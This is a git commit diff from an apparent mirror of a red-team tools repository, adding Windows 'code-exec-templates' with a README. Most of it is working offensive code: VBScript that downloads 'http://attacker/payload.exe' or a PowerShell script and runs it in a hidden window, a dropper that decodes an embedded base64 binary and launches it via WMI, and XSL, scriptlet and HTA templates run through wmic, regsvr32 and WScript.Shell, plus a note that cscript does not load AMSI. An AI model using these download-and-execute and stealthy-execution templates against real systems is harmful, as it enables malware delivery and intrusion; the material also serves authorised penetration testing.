Git/mgeeky-Penetration-Testing-Tools
1
0
Fork 0
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git synced 2025-10-08 19:32:52 +02:00
Code Issues Packages Projects Releases Wiki Activity

Added code-exec-templates and some additions to rogue-dot-net

Browse Source
This commit is contained in:
mgeeky
2020-05-07 01:42:52 +02:00
parent b7c7da7b4e
commit 8b03b5ba40
14 changed files with 806 additions and 723 deletions
Download Patch File Download Diff File Expand all files Collapse all files

136
red-teaming/code-exec-templates/README.md
View File

@ -1,67 +1,71 @@
### A small collection of unobfuscated code-execution primitives in different languages
A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one.
Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters:
- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI**
- `wscript.exe` - For general scripts execution. **This one loads AMSI**
---
#### VBScript
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell`
---
#### JScript
---
#### XSL
XSL files can be executed in the following ways:
- Using `wmic.exe`:
```
wmic os get /format:"jscript-xslt-template.xsl"
```
Templates:
- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box.
- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method
---
#### COM Scriptlets
Sample code execution with `regsvr32` can be following:
```
regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll
```
- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run`
---
#### HTA
HTA files are HTML Applications
### A small collection of unobfuscated code-execution primitives in different languages
A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one.
Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters:
- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI**
- `wscript.exe` - For general scripts execution. **This one loads AMSI**
---
#### VBScript
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
- **`download-powershell-and-exec-via-stdin`** - Downloads a Powershell script/commands from a given URL and passes them to _Powershell_'s `StdIn`
- **`drop-binary-file-and-launch.vbs`** - Drops embedded base64 encoded binary file to disk and then launches it.
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell`
---
#### JScript
---
#### XSL
XSL files can be executed in the following ways:
- Using `wmic.exe`:
```
wmic os get /format:"jscript-xslt-template.xsl"
```
Templates:
- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box.
- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method
---
#### COM Scriptlets
Sample code execution with `regsvr32` can be following:
```
regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll
```
- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run`
---
#### HTA
HTA files are HTML Applications
- **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_

72
red-teaming/code-exec-templates/download-file-and-exec.vbs
View File

@ -1,38 +1,36 @@
'
' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
downloadURL = "http://attacker/payload.exe"
saveAs = "%TEMP%\foo.exe"
parameters = ""
Dim sh: Set sh = CreateObject("WScript.Shell")
out = sh.ExpandEnvironmentStrings(saveAs)
' STEP 1: Download File
Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
xhr.Open "GET", downloadURL, False
xhr.Send
' STEP 2: Save binary file
If xhr.Status = 200 Then
With CreateObject("Adodb.Stream")
.Open
.Type = 1
.write xhr.responseBody
.savetofile out, 2
End With
' STEP 3: Execute file
cmd = out & " " & parameters
MsgBox cmd
sh.Run cmd, 0, False
End If
Set sh = Nothing
'
' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
downloadURL = "http://attacker/payload.exe"
saveAs = "%TEMP%\foo.exe"
parameters = ""
Dim sh: Set sh = CreateObject("WScript.Shell")
out = sh.ExpandEnvironmentStrings(saveAs)
' STEP 1: Download File
Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
xhr.Open "GET", downloadURL, False
xhr.Send
' STEP 2: Save binary file
If xhr.Status = 200 Then
With CreateObject("Adodb.Stream")
.Open
.Type = 1
.write xhr.responseBody
.savetofile out, 2
End With
' STEP 3: Execute file
cmd = out & " " & parameters
sh.Run cmd, 0, False
End If
Set sh = Nothing
Set xhr = Nothing

34
red-teaming/code-exec-templates/download-powershell-and-exec-via-stdin.vbs Normal file
View File

@ -0,0 +1,34 @@
'
' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
scriptURL = "http://attacker/script.ps1"
launcher = "powershell -nop -w hid -Command -"
Dim xhr: Set xhr = CreateObject("MSXML2.XMLHTTP")
xhr.Open "GET", scriptURL, False
xhr.Send
Function bin2a(Binary)
Dim I,S
For I = 1 to LenB(Binary)
S = S & Chr(AscB(MidB(Binary,I,1)))
Next
bin2a = S
End Function
If xhr.Status = 200 Then
With CreateObject("WScript.Shell")
With .Exec(launcher)
.StdIn.WriteLine bin2a(xhr.responseBody)
.StdIn.WriteBlankLines 1
.Terminate
End With
End With
End If
Set xhr = Nothing

47
red-teaming/code-exec-templates/drop-binary-file-and-launch.vbs Normal file
View File

@ -0,0 +1,47 @@
'
' Example of dropping an embedded, base64 encoded binary file to the disk,
' decoding it and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
saveFileAs = "%TEMP%\foo.exe"
launchParameters = ""
' =============================================================
fileBuffer = "<PASTE-HERE-YOUR-BASE64-ENCODED-BLOB>"
' =============================================================
Function Base64Decode(ByVal vCode)
Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Base64Decode = oNode.nodeTypedValue
Set oNode = Nothing
End Function
Dim sh: Set sh = CreateObject("WScript.Shell")
out = sh.ExpandEnvironmentStrings(saveFileAs)
With CreateObject("Adodb.Stream")
.Open
.Type = 1
.write Base64Decode(fileBuffer)
.savetofile out, 2
End With
computer = "."
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
& computer & "\root\cimv2")
Set startup = wmi.Get("Win32_ProcessStartup")
Set conf = startup.SpawnInstance_
conf.ShowWindow = 12
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
command = out & " " & launchParameters
proc.Create command, Null, conf, intProcessID

28
red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl
View File

@ -1,15 +1,15 @@
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
// Hello world
var shell = new ActiveXObject("WScript.Shell");
shell.Popup("Hello world from JScript XSL!");
]]> </ms:script>
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
// Hello world
var shell = new ActiveXObject("WScript.Shell");
shell.Popup("Hello world from JScript XSL!");
]]> </ms:script>
</stylesheet>

38
red-teaming/code-exec-templates/wmi-exec-command.vbs
View File

@ -1,20 +1,20 @@
'
' This script uses WMI class' Win32_Process static method Create to
' execute given command in a hidden window (ShowWindow = 12).
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
command = "notepad.exe"
computer = "."
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
& computer & "\root\cimv2")
Set startup = wmi.Get("Win32_ProcessStartup")
Set conf = startup.SpawnInstance_
conf.ShowWindow = 12
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
'
' This script uses WMI class' Win32_Process static method Create to
' execute given command in a hidden window (ShowWindow = 12).
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
command = "notepad.exe"
computer = "."
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
& computer & "\root\cimv2")
Set startup = wmi.Get("Win32_ProcessStartup")
Set conf = startup.SpawnInstance_
conf.ShowWindow = 12
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
proc.Create command, Null, conf, intProcessID

26
red-teaming/code-exec-templates/wscript-shell-code-exec.vbs
View File

@ -1,13 +1,13 @@
'
' This script uses classic WScript.Shell Run method to
' execute given command in a hidden window (second param = 0)
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
command = "notepad.exe"
With CreateObject("WScript.Shell")
.Run command, 0, False
End With
'
' This script uses classic WScript.Shell Run method to
' execute given command in a hidden window (second param = 0)
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
command = "notepad.exe"
With CreateObject("WScript.Shell")
.Run command, 0, False
End With

28
red-teaming/code-exec-templates/wscript-shell-run-jscript-scriptlet.sct
View File

@ -1,15 +1,15 @@
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Foo"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var command = "notepad.exe";
var r = new ActiveXObject("WScript.Shell").Run(command);
]]>
</script>
</registration>
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Foo"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var command = "notepad.exe";
var r = new ActiveXObject("WScript.Shell").Run(command);
]]>
</script>
</registration>
</scriptlet>

26
red-teaming/code-exec-templates/wscript-shell-run-jscript-xslt.xsl
View File

@ -1,14 +1,14 @@
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var command = "notepad";
var r = new ActiveXObject("WScript.Shell").Run(command);
]]> </ms:script>
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var command = "notepad";
var r = new ActiveXObject("WScript.Shell").Run(command);
]]> </ms:script>
</stylesheet>

26
red-teaming/code-exec-templates/wscript-shell-run-vbscript.hta
View File

@ -1,14 +1,14 @@
<html>
<head>
<script language="VBScript">
Sub foo
command = "notepad.exe"
Set objShell = CreateObject("Wscript.Shell")
objShell.Run command
End Sub
foo()
</script>
</head>
<body>
</body>
<html>
<head>
<script language="VBScript">
Sub foo
command = "notepad.exe"
Set objShell = CreateObject("Wscript.Shell")
objShell.Run command
End Sub
foo()
</script>
</head>
<body>
</body>
</html>

38
red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs
View File

@ -1,19 +1,19 @@
'
' This script uses classic WScript.Shell Exec method to
' execute given command in a hidden window via StdIn passed to a dedicated
' launcher command (powershell.exe in this example).
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
command = "notepad.exe"
launcher = "powershell -nop -w hid -Command -"
With CreateObject("WScript.Shell")
With .Exec(launcher)
.StdIn.WriteLine command
.StdIn.WriteBlankLines 1
.Terminate
End With
End With
'
' This script uses classic WScript.Shell Exec method to
' execute given command in a hidden window via StdIn passed to a dedicated
' launcher command (powershell.exe in this example).
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'
command = "notepad.exe"
launcher = "powershell -nop -w hid -Command -"
With CreateObject("WScript.Shell")
With .Exec(launcher)
.StdIn.WriteLine command
.StdIn.WriteBlankLines 1
.Terminate
End With
End With